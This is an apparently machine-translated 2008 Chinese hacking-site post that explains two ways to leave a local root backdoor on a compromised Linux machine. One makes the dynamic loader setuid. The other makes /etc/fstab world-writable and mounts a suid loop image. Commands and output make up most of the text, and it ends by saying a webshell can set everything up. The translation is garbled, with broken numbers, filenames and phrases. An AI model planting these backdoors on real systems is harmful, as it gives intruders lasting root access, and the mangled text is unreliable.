under linux to stay Local the back door of the two methods-vulnerability warning-the black bar safety net

2008-09-17T00:00:00
ID MYHACK58:62200820409
Type myhack58
Reporter 佚名
Modified 2008-09-17T00:00:00

Description

Method one: setuid method, in fact, 8 is very secluded. Look at the process:

[root@localdomain lib]# ls-l |grep ld-linux lrwxrwxrwx 1 root root 9 2008-06-07 1 7:3 2 ld-linux. so. 2 -> ld-2.7. so lrwxrwxrwx 1 root root 1 3 2008-06-07 1 7:4 7 ld-lsb. so. 3 -> ld-linux. so. 2 [root@localdomain lib]# chmod +s ld-linux. so. 2 [root@localdomain lib]# ls-l |grep ld-2.7. so -rwsr-sr-x 1 root root 1 2 8 9 5 2 2007-10-18 0 4:4 9 ld-2.7. so lrwxrwxrwx 1 root root 9 2008-06-07 1 7:3 2 ld-linux. so. 2 -> ld-2.7. so [root@localdomain lib]# We are here to/lib/ld-linux. so. 2 This file in FC8, it points to ld-2.7. so this file with the setuid attribute. And then we see how to use it.

Ordinary users login, test the following permissions:

[xiaoyu@localdomain ~]$ whoami xiaoyu [xiaoyu@localdomain ~]$ /lib/ld-linux. so. 2 which whoami root [xiaoyu@localdomain ~]$ Well, Hey, Hey, root it, specifically how to generate a root shell, and your own to think about it, everything do not point too thoroughly, right. Oh, to be sure of the point,/lib/ld-linux. so. 2 /bin/sh certainly generate no rootshell, bash checks the EUID has been and uid, to see whether it is equal...OK, not much to say.

Method two:

See the process:

[root@localdomain etc]# chmod a+w /etc/fstab [root@localdomain etc]#

It will stay good. This method is relatively XXOXX, an estimated few of the Administrators know. Use of the method demonstrates the following

[xiaoyu@localdomain ~]$ ls-l /etc/fstab -rw-rw-rw - 1 root root 4 5 6 2008-06-07 1 7:2 8 /etc/fstab [xiaoyu@localdomain ~]$ echo 'test /mnt ext2 user,suid,exec,loop 0 0' >> /etc/fstab

And then from this machine to put a file to the target machine up, and here we named the test

[xiaoyu@localdomain tmp]$ ls-l test -rw-rw-r-- 1 xiaoyu xiaoyu 1 0 2 4 0 0 2008-04-20 0 2:5 1 test [xiaoyu@localdomain tmp]$ mount test [xiaoyu@localdomain tmp]$ cd /mnt [xiaoyu@localdomain mnt]$ ls-l total 1 8 drwx------ 2 root root 1 2 2 8 8 2008-04-20 0 5:4 4 lost+found -rwsr-sr-x 1 root root 4 9 2 7 2008-04-20 0 5:4 4 root [xiaoyu@localdomain mnt]$ ./ root sh-3.2# As you can see, from the ordinary user to elevate to root. Huh. test this file baidu looks like wood with the upload function sprinkle, wooden way to pass

Looks like someone may say that the Local the back door of wood what bird to use, but you have to figure out: a webshell which can be complete all of this....